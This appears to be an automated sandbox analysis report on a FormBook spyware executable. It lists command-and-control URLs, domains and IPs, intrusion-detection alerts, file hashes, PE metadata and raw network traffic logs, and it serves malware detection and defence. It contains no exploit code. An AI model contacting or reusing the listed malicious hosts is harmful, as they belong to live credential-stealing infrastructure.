http://www.dojodigitize.shop/zxe0/?ynlT=El+NSyicP5BK/60EXWXaz7evSHJwK2e1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkBnZYNNwJ4YcRegv3/W3TWhCxoQqPNBROUFaIQ8+8cz4+g==&BZcp=FxLxsNCx3xt | true | Avira URL Cloud: safe | unknown
http://www.masterqq.pro/vfw3/ | true | Avira URL Cloud: safe | unknown
http://www.learnnow.info/6npp/?ynlT=jlm9uKJBzKMSKltuZ8hnGP24BGKDKPXveDKXZTqGsHNtP0MrAi/8oe7gvYTD+ahEZPaxXoJGvNi0UKW4HyzdiXWiw3/my+fKayPUfiCFUifSzt7jgsgTxNAwRGE5teyGFg==&BZcp=FxLxsNCx3xt | true | Avira URL Cloud: safe | unknown
http://www.hasan.cloud/ve8l/ | true | Avira URL Cloud: safe | unknown
http://www.fengzheng.shop/plc2/ | true | Avira URL Cloud: safe | unknown
http://www.ssps.shop/r99d/?ynlT=ksK/jUMQwoE3w4qE/G/QpncBqYFbE8pmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4iduIg7f9mhgZE4uc2OAykkUS/1hIqxxaY527NhMhRLm7btA==&BZcp=FxLxsNCx3xt | true | Avira URL Cloud: safe | unknown
http://www.goldbracelet.top/eln6/?ynlT=dR5Y3aKNW3l55kULB1rxeiPlAcv1NFYB73Jn5o4FF8VATzcLQGkwEffEVFziLlDWg39FgTTosOgM31CCD8Gpd9wAhADTehU2x1Z0W7eNB4qt+OY8C4hNNFAeSI1HhK3X2w==&BZcp=FxLxsNCx3xt | true | Avira URL Cloud: safe | unknown
http://www.masterqq.pro/vfw3/?ynlT=rqg4sojPN1HzbyOgPnJNE4SyCm0Y3+McauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXfpXxUIp7SdBR5fyivcNmDQrGMikN20eFfd6B8gSgv5TSw==&BZcp=FxLxsNCx3xt | true | Avira URL Cloud: safe | unknown
http://www.goldbracelet.top/eln6/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.fengzheng.shop | YpbicUfTwt.exe, 00000007.00000002.3865989919.0000000005858000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dts.gnpge.com | YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.regislemberthe.online/px.js?ch=2 | find.exe, 00000005.00000002.3865918446.00000000048A8000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.regislemberthe.online/px.js?ch=1 | find.exe, 00000005.00000002.3865918446.00000000048A8000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.regislemberthe.online/sk-logabpstatus.php?a=alFjTmVnTnFFNS9SV3Y0RDlHR3BoMWZmc2gvcGRoa1Fye | find.exe, 00000005.00000002.3865918446.00000000048A8000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://imweb.me/login | find.exe, 00000005.00000002.3865918446.0000000003F3C000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000003DDC000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com | find.exe, 00000005.00000002.3865918446.0000000004A3A000.00000004.10000000.00040000.00000000.sdmp, find.exe, 00000005.00000002.3867588890.0000000005C20000.00000004.00000800.00020000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.00000000048DA000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
38.47.233.4 | qqc5.top | United States | 174 | COGENT-174US | true
13.248.169.48 | www.gupiao.bet | United States | 16509 | AMAZON-02US | true
104.21.36.239 | www.goldbracelet.top | United States | 13335 | CLOUDFLARENETUS | true
172.67.213.249 | www.masterqq.pro | United States | 13335 | CLOUDFLARENETUS | true
199.192.23.123 | www.learnnow.info | United States | 22612 | NAMECHEAP-NETUS | true
15.197.142.173 | dojodigitize.shop | United States | 7430 | TANDEMUS | true
13.227.8.45 | www.tageting.shop | United States | 16509 | AMAZON-02US | true
199.59.243.227 | www.honk.city | United States | 395082 | BODIS-NJUS | true
208.91.197.27 | www.regislemberthe.online | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
173.0.157.187 | 0be.info | United States | 7979 | SERVERS-COMUS | true
185.26.237.170 | www.fengzheng.shop | European Union | 57169 | EDIS-AS-EUAT | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1562914
Start date and time: 2024-11-26 09:26:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@17/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 103
• Number of non-executed functions: 293
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target YpbicUfTwt.exe, PID 5348 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• VT rate limit hit for: file.exe
Time | Type | Description
03:27:03 | API Interceptor | 2x Sleep call for process: file.exe modified
03:27:56 | API Interceptor | 10492276x Sleep call for process: find.exe modified
Process: C:\Users\user\Desktop\file.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
MD5: E193AFF55D4BDD9951CB4287A7D79653
SHA1: F94AD920B9E0EB43B5005D74552AB84EAA38E985
SHA-256: 08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
SHA-512: 86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
Malicious: true
Reputation: moderate, very likely benign file
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
Process: C:\Windows\SysWOW64\find.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1209886597424439
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5: EFD26666EAE0E87B32082FF52F9F4C5E
SHA1: 603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256: 67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512: 28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious: false
Reputation: moderate, very likely benign file
                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.7584653084882875
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: file.exe
File size: 774'656 bytes
MD5: 09e5c83fa32b0bb661143784179329a0
SHA1: 0fa6b1217891055124b62ed520f63d7d2b28536e
SHA256: 1258f319f29525155f61593b7533e03ab0db3bc3fb823842a752044e80790a3c
SHA512: a66e84088facf207e3ecc4ac5e4d7b3b2f97de60d2c5175ea806b5d17a92c8f951913eea6554eac0b64125c0aa0896702a782b5c95676e31c144ca2ed7d8e69f
SSDEEP: 12288:GCb+eCSmJJ2EuItS1zhK16BcyOUjm0/p2M5dq/A2Cv4FR3udAe4HwIjMfpoEkxDF:PCbJ4ZNgIS1UK0/pJ5AYKudaPYW3dLIE
TLSH: 13F40259231ADA17E9D61BB488A1E3B116BC2ECCA901D3178BEDBDFB3C3531574092E1
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-*Eg..............0.................. ........@.. .......................@............@................................
Icon Hash: 322e2e3eee6e2697
Entrypoint: 0x4bc0f6
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x67452A2D [Tue Nov 26 01:53:49 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xbc0a4          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xbe000          0x2a6c        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xc2000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xba0fc       0xba200   79197fcda298a850fe5e9105fac679bc  False     0.915719180238415   data       7.764392398976114    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xbe000          0x2a6c        0x2c00    5cc095b9a4cf222faf588af49901b7a1  False     0.8670987215909091  data       7.468365920054706    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xc2000          0xc           0x200     e018be8d9ebbc6ea3696e65329f61a53  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                                               Language  Country  ZLIB Complexity
RT_ICON        0xbe100  0x241d  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                                            0.9700378583017848
RT_GROUP_ICON  0xc0530  0x14    data                                                                                                   1.05
RT_VERSION     0xc0554  0x318   data                                                                                                   0.4444444444444444
RT_MANIFEST    0xc087c  0x1ea   XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                      0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                 Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-11-26T09:26:58.603302+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.8  49761        185.26.237.170  80         TCP
2024-11-26T09:27:36.156305+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.8  49712        15.197.142.173  80         TCP
2024-11-26T09:28:01.113609+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.8  49717        172.67.213.249  80         TCP
2024-11-26T09:28:15.930091+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.8  49721        13.248.169.48   80         TCP
2024-11-26T09:28:31.005926+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.8  49725        173.0.157.187   80         TCP
2024-11-26T09:28:47.196730+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.8  49729        13.227.8.45     80         TCP
2024-11-26T09:29:10.336980+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.8  49733        13.248.169.48   80         TCP
2024-11-26T09:29:26.297337+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.8  49737        38.47.233.4     80         TCP
2024-11-26T09:29:41.221072+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.8  49741        199.192.23.123  80         TCP
2024-11-26T09:29:56.496958+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.8  49745        104.21.36.239   80         TCP
2024-11-26T09:30:13.423589+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.8  49749        208.91.197.27   80         TCP
2024-11-26T09:30:28.972131+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.8  49753        199.59.243.227  80         TCP
2024-11-26T09:30:44.357789+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.8  49757        13.248.169.48   80         TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                Nov 26, 2024 09:28:29.672647953 CET8049725173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:29.673633099 CET4972580192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:29.682641983 CET4972580192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:29.802655935 CET8049725173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:31.005750895 CET8049725173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:31.005769968 CET8049725173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:31.005925894 CET4972580192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:31.009406090 CET4972580192.168.2.8173.0.157.187
                                                                                Nov 26, 2024 09:28:31.129398108 CET8049725173.0.157.187192.168.2.8
                                                                                Nov 26, 2024 09:28:36.938642025 CET4972680192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:37.058711052 CET804972613.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:37.065845013 CET4972680192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:37.174638033 CET4972680192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:37.294791937 CET804972613.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:38.674643993 CET4972680192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:38.795089960 CET804972613.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:38.795253038 CET4972680192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:39.774802923 CET4972780192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:39.894918919 CET804972713.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:39.895015001 CET4972780192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:40.097840071 CET4972780192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:40.219871044 CET804972713.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:41.611140013 CET4972780192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:41.731997013 CET804972713.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:41.732058048 CET4972780192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:42.630810976 CET4972880192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:42.751013994 CET804972813.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:42.752962112 CET4972880192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:42.767025948 CET4972880192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:42.887142897 CET804972813.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:42.887207031 CET804972813.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:44.282886982 CET4972880192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:44.403196096 CET804972813.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:44.403400898 CET4972880192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:45.301595926 CET4972980192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:45.421919107 CET804972913.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:45.423240900 CET4972980192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:45.433423042 CET4972980192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:45.553503990 CET804972913.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:47.196552992 CET804972913.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:47.196573973 CET804972913.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:47.196588039 CET804972913.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:47.196600914 CET804972913.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:28:47.196729898 CET4972980192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:47.202663898 CET4972980192.168.2.813.227.8.45
                                                                                Nov 26, 2024 09:28:47.322848082 CET804972913.227.8.45192.168.2.8
                                                                                Nov 26, 2024 09:29:01.069724083 CET4973080192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:01.189955950 CET804973013.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:01.192846060 CET4973080192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:01.206409931 CET4973080192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:01.326445103 CET804973013.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:02.296447039 CET804973013.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:02.296561956 CET4973080192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:02.752844095 CET4973080192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:02.873239040 CET804973013.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:03.783857107 CET4973180192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:03.904021025 CET804973113.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:03.904114008 CET4973180192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:03.925929070 CET4973180192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:04.046046019 CET804973113.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:05.098381996 CET804973113.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:05.098511934 CET4973180192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:05.442717075 CET4973180192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:05.562819004 CET804973113.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:06.458260059 CET4973280192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:06.578389883 CET804973213.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:06.578532934 CET4973280192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:06.592339039 CET4973280192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:06.712811947 CET804973213.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:06.712832928 CET804973213.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:07.723377943 CET804973213.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:07.723439932 CET4973280192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:08.095416069 CET4973280192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:08.215852976 CET804973213.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:09.114711046 CET4973380192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:09.234957933 CET804973313.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:09.238415956 CET4973380192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:09.250710011 CET4973380192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:09.370748043 CET804973313.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:10.336684942 CET804973313.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:10.336800098 CET804973313.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:10.336980104 CET4973380192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:10.339993954 CET4973380192.168.2.813.248.169.48
                                                                                Nov 26, 2024 09:29:10.460074902 CET804973313.248.169.48192.168.2.8
                                                                                Nov 26, 2024 09:29:16.278610945 CET4973480192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:16.398682117 CET804973438.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:16.398770094 CET4973480192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:16.413953066 CET4973480192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:16.534956932 CET804973438.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:17.923899889 CET4973480192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:18.035614967 CET804973438.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:18.035684109 CET804973438.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:18.035731077 CET4973480192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:18.035772085 CET4973480192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:18.043950081 CET804973438.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:18.044008970 CET4973480192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:18.998424053 CET4973580192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:19.118568897 CET804973538.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:19.118896008 CET4973580192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:19.234749079 CET4973580192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:19.354974031 CET804973538.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:20.664648056 CET804973538.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:20.664669037 CET804973538.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:20.664912939 CET4973580192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:20.738732100 CET4973580192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:21.871553898 CET4973680192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:21.991780996 CET804973638.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:21.991930008 CET4973680192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:22.082773924 CET4973680192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:22.203206062 CET804973638.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:22.203250885 CET804973638.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:23.582566977 CET804973638.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:23.582592964 CET804973638.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:23.582659960 CET4973680192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:23.595568895 CET4973680192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:24.614818096 CET4973780192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:24.735099077 CET804973738.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:24.742768049 CET4973780192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:24.750760078 CET4973780192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:24.870927095 CET804973738.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:26.297172070 CET804973738.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:26.297198057 CET804973738.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:26.297337055 CET4973780192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:26.300601006 CET4973780192.168.2.838.47.233.4
                                                                                Nov 26, 2024 09:29:26.420552969 CET804973738.47.233.4192.168.2.8
                                                                                Nov 26, 2024 09:29:31.809704065 CET4973880192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:31.930335999 CET8049738199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:31.930428982 CET4973880192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:31.949333906 CET4973880192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:32.069710970 CET8049738199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:33.212165117 CET8049738199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:33.212234020 CET8049738199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:33.212331057 CET4973880192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:33.476690054 CET4973880192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:34.489736080 CET4973980192.168.2.8199.192.23.123
